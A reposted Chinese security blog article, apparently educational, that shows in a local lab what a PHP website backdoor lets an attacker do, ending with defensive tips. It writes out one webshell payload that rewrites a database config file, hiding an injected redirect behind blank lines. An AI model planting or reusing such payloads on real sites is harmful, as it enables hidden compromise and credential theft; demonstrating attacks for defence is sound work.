黑客可以利用网站的后门做什么? - 汇站网

黑客可以利用网站的后门做什么?

2023-12-10 0 740

说明:

写代码的人需要特别注意安全问题,绝不能轻信用户的输入。

测试准备:

为了模拟攻击,我在本地搭建了一个服务器环境,展示了一个正常的网站如何被攻击。

首先,我修改了电脑本地的 host 文件,这样就可以通过 test.com 虚拟域名访问本地文件了。host 文件的路径在“ C:\Windows\System32\drivers\etc ”。

网站目录非常简单,如下所示:

在网站的入口文件中,我引用了数据库配置文件,并输出了一句话来模拟网站首页。

在数据库配置文件中,我参考了当前流行的框架ThinkPHP的数据库配置文件,返回了一个包含数据库端口和密码等基本信息的数组。

接下来是我们的重点,黑客后门文件。

也许你会觉得,就这些代码能做什么呢?

开始模拟攻击:

我们先访问一下我们的网站,发现可以正常访问,没有任何问题。

然后访问一下黑客文件,也好像没有问题。

1、输出PHP版本信息:

现在黑客已经知道了你的后台 PHP 版本,以及安装了哪些插件,使用的是哪种数据库。

2、网页重定向:

可以跳转到百度了,这表示黑客已经搭建好了一个可以运行代码的环境。现在通过你的网站,黑客可以随意执行任意一行代码。

3、读取数据库配置信息:

黑客已经获取到了你的密码等信息,你的网站上的数据都可以被修改了,这是不是让你害怕呢?甚至可以“删库跑路”!!

4、删除文件:

看,1.txt 文件已经被删除了。黑客可以删除你网站上的任意文件。

5、修改文件

?config=
// 读取数据库配置文件
$info=file_get_contents("Conf/db.php");
// 设置很多个换行符号
$change=str_repeat("\r\n",50);
// 用空格代替<?php 
$file= str_replace("<?php","",$info);
// 你想添加的任何功能都可以写在下面
$extCode="header('location:http://www.baidu.com');";
...

// 最后组合起来,保存回去
file_put_contents("Conf/db.php","<?php".$change.$extCode.$file);

来看看你的 db.php 文件是如何被修改的

在文件头部添加了大量的换行符,你可能会认为文件是空的,但实际上他已经在文件中插入了一行跳转代码,无论其他人如何访问你的网站,都会被重定向到他所指定的网站。

攻击 End

看完是不是大吃一惊?别慌:我们应该如何防范呢?

不要相信用户的输入!不要相信用户的输入!不要相信用户的输入!
在获取用户输入之前一定要进行过滤处理;
在服务器上,设置文件的权限,不要给每个文件都赋予执行脚本的权限;
可以增加防篡改功能;
或者修改你服务器的安全组,修改默认端口如 22、21 等,不要开放所有端口;
对整个站点进行木马扫描。

转载请注明:汇站网 » 黑客可以利用网站的后门做什么?

收藏 (0)

微信扫一扫

支付宝扫一扫

点赞 (0)

感谢您的来访,获取更多精彩资源请收藏本站。

本站声明

本资源仅用于个人学习和研究使用,禁止用于任何商业环境!

 1.  本网站名称:汇站网
 2.  本站永久网址:https://www.huizhanii.com/
 3.  本站所有资源来源于网友投稿和高价购买,所有资源仅对编程人员及源代码爱好者开放下载做参考和研究及学习,本站不提供任何技术服务!
 4.  未经原版权作者许可,禁止用于任何商业环境,任何人不得擅作它用,下载者不得用于违反国家法律,否则发生的一切法律后果自行承担!
 5.  为尊重作者版权,请在下载24小时内删除!请购买原版授权作品,支持你喜欢的作者,谢谢!
 6.  若资源侵犯了您的合法权益, 请持您的版权证书和相关原作品信息来信通知我们请来信     通知我们我们会及时删除,给您带来的不便,我们深表歉意!
 7.  如下载链接失效、广告或者压缩包问题请联系站长处理!
 8.  如果你也有好源码或者教程,可以发布到网站,分享有金币奖励和额外收入!
 9.  本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
 10.  因源码具有可复制性,一经赞助 ,不得以任何形式退款。
 11.  更多详情请点击查看

汇站网 技术安全 黑客可以利用网站的后门做什么? https://www.huizhanii.com/34084.html

汇站

站长资源下载中心-找源码上汇站

常见问题
  • 如果付款后没有弹出下载页面,多刷新几下,有问题联系客服!
查看详情
  • 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。
查看详情

相关文章

发表评论
暂无评论
  随机评论 表情开关按钮图片
表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情表情
登录后评论
联系官方客服

为您解决烦忧 - 24小时在线 专业服务

(汇站网)一个专注站长资源的平台网站,提供最新的网站模板和整站源码,内容包含各类精品网页模板,企业网站模板,网站模板,DIV+CSS模板,织梦模板,帝国cms模板,discuz模板,wordpress模板,个人博客论坛模板,上千种免费网页模板下载尽在汇站网.找源码上汇站.huizhanii.com